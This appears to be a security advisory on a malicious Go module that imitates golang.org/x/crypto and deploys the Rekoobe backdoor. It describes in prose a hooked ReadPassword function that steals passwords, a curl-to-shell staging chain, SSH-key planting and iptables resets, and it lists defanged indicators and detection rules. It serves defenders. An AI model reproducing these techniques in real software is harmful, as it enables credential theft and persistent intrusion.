Malicious Go Crypto Module Steals Passwords and Deploys Rekoobe Backdoor in Developer Environments
A newly identified supply chain attack is targeting Go developers, with a malicious module masquerading as a legitimate and widely used cryptographic library. This compromised module, named github[.]com/xinfei_soft/crypto, has been observed to steal developer credentials and silently deploy the sophisticated Rekoobe Linux backdoor onto affected systems, posing a significant threat to the software development ecosystem. The campaign highlights the increasing sophistication of attackers who weaponize even trusted dependency names within a developer’s workflow.
The malicious module gained traction by mimicking the popular and trusted golang.org/x/crypto repository. Researchers at Socket.dev discovered that this imposter module, published at version v0.15.0 with an intended publication date of February 20, 2025, copied the exact structure of the original, including well-known subpackages like bcrypt, argon2, acme, and ssh. This tactic exploits how the Go ecosystem utilizes GitHub as a mirror for its canonical repositories, making the fake module appear routine during code reviews and dependency checks.
The Multi-Stage Backdoor Delivery Chain
The malicious code was embedded within the `ssh/terminal/terminal.go` file, specifically targeting the `ReadPassword` helper function. This function is commonly used by developer tools for handling sensitive information such as SSH passphrases, database logins, and API keys that are entered interactively. The backdoor’s design ensures it activates only during live interactive sessions, a deliberate tactic to evade detection during automated testing and significantly reduce the likelihood of accidental discovery by developers.
Upon invocation of the compromised `ReadPassword` function, the malicious module captures user credentials in plaintext. These stolen credentials are then exfiltrated to a file located at `/usr/share/nano/.lock`, a path chosen to remain inconspicuous. Subsequently, the module fetches a staging pointer from the attacker’s GitHub-hosted repository and transmits the stolen password to a dynamically resolved endpoint. This communication is followed by the retrieval and execution of a shell script via `/bin/sh`. This architecture allows the threat actor to modify infrastructure URLs without needing to re-publish the malicious module, enhancing stealth and adaptability.
The Go security team has since taken action by blocking the module at the public proxy, issuing a 403 SECURITY ERROR response to prevent further distribution. However, the potential impact remains substantial for organizations developing in Go-based Linux environments. This includes teams managing cloud virtual machines, CI/CD pipelines, and administrative bastion hosts, where any application importing this module and utilizing the `ReadPassword` function could become a vulnerable point for credential harvesting, exposing critical information before any security measures like hashing or encryption can be applied.
The backdoor’s execution involves a complex, multi-stage delivery chain orchestrated through various online resources. After the initial script execution from the compromised `ReadPassword` function, the process continues by fetching `update.html` from the attacker’s GitHub repository. This file acts as a redirect, leading to `seed.php` hosted on `img[.]spoolsv[.]cc`. This endpoint then serves a `curl | sh` launcher, responsible for downloading and executing `snn50.txt`, which serves as the primary Linux stager. This stager meticulously prepares the host system and facilitates the delivery of the final payload.
The `snn50.txt` stager performs several critical actions designed to establish persistent access and weaken the compromised system’s defenses. Firstly, it appends a threat actor-controlled SSH public key to the `/home/ubuntu/.ssh/authorized_keys` file. This creates a backdoor for remote access that persists even if the original password is changed. Secondly, it modifies the system’s firewall by setting `iptables` default policies to `ACCEPT`, effectively disabling critical security rules. Finally, it downloads two files, `sss.mp5` and `555.mp5`, from `img[.]spoolsv[.]cc`. These files are disguised with media-like extensions to evade basic file inspection. Once executed, they are deleted from the disk to minimize forensic evidence.
Socket.dev researchers identified `555.mp5` as a variant of the Rekoobe Linux backdoor. This backdoor has documented ties to the APT31 (also known as Zirconium) threat group and exhibits partial lineage from the Tiny SHell codebase. The Rekoobe backdoor communicates with a command-and-control server at `154[.]84[.]63[.]184` over TCP port 443. Notably, this communication does not employ a standard TLS handshake, suggesting the use of custom encrypted traffic designed to mimic legitimate HTTPS traffic and bypass network security monitoring.
Organizations utilizing Go should proactively audit their `go.mod` and `go.sum` files for any unexpected changes in module roots. Every new dependency addition should be treated as a scrutinized security review item. Endpoint monitoring should be enhanced to detect suspicious writes to `/usr/share/nano/.lock`, unauthorized modifications to `authorized_keys` files, and any resets of `iptables` policies to an `ACCEPT` state. Network-level defenses can be bolstered by blocking the domains `img[.]spoolsv[.]cc` and `img[.]spoolsv[.]net`. Additionally, alerts should be configured for processes that chain GitHub Raw fetches with outbound HTTP POST requests, as this pattern can serve as an early indicator of the active backdoor delivery chain before the final payload is fully deployed.